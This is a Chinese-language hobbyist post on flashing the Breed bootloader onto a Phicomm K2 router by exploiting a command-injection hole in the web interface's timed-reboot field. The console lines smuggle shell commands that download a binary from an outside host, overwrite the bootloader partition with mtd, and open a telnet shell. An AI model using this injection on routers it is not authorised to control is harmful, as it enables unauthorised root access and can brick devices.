昨天刚买的,版本A6 V22.4.6.3 一键刷机已经封了。
提醒:伸手党和喷粪族绕行,我成功了,不代表你可以行,也许我是侥幸呢,不对由此带来的后果负责!
看到论坛里有大神,帮忙免费生成mac加密配置文件。也发给他了,可能忙回复慢,我等不及谷歌了一下web漏洞的方法很简单,代码执行完即可需要一个chrome浏览器,斐迅路由器联网。
1.点击右上角的电源按钮,选择定时重启
2.点击启用定时功能
3.按F12(最新版的固件F12都禁止了,可以使用chrome的选项点击“更多工具”-》“开发者工具”)
4.在Console里面黏贴下面的语句,每次输入一条然后按enter键
$("#timerebootmin").val("05 | wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin")
$("#timeRebootSave").click()
$("#timerebootmin").val("05 | mtd unlock Bootloader")
$("#timeRebootSave").click()
$("#timerebootmin").val("05 | mtd write breed-mt7620-phicomm-psg1208.bin Bootloader")
$("#timeRebootSave").click()
5.重启路由
6.按住reset键,插入电源,等待3秒,可能更长时间,路由器lan口网线连接到电脑,打开到192.168.1.1,可以看到breed恢复控制台
以上方法来自网络,亲测成功,但不对由此带来的后果负责。
另外亲测可以利用上面的方法,开启原来固件的telnet功能。代码如下 方法同上每次一条然后回车。
$("#timerebootmin").val("05 | /usr/sbin/telnetd -l /bin/login.sh")
$("#timeRebootSave").click()
另:今天另一台k2 A6 V22.4.6.3 思考了一下用下面的方法刷的breed成功,抛砖引玉。
提醒:不对此承担责任,后果自负,用不用自便,别喷fen
先开telnet然后登录后命令行下刷。
具体,先通过谷歌浏览器利用web漏洞开telnet
$("#timerebootmin").val("05 | /usr/sbin/telnetd -l /bin/login.sh")
$("#timeRebootSave").click()
然后通过telnet 192.168.2.1 登录 依此运行下面的红色命令
切换目录到tmp
cd /tmp
下载breed,可以直观看到下载进程
wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin
解锁
mtd unlock Bootloader
写breed到引导区。
mtd write breed-mt7620-phicomm-psg1208.bin Bootloader
好了,刷breed成功。感觉比上面的直观些。
Tags:
请在这里放置你的在线分享代码
本文暂时没有评论,来添加一个吧(●'◡'●)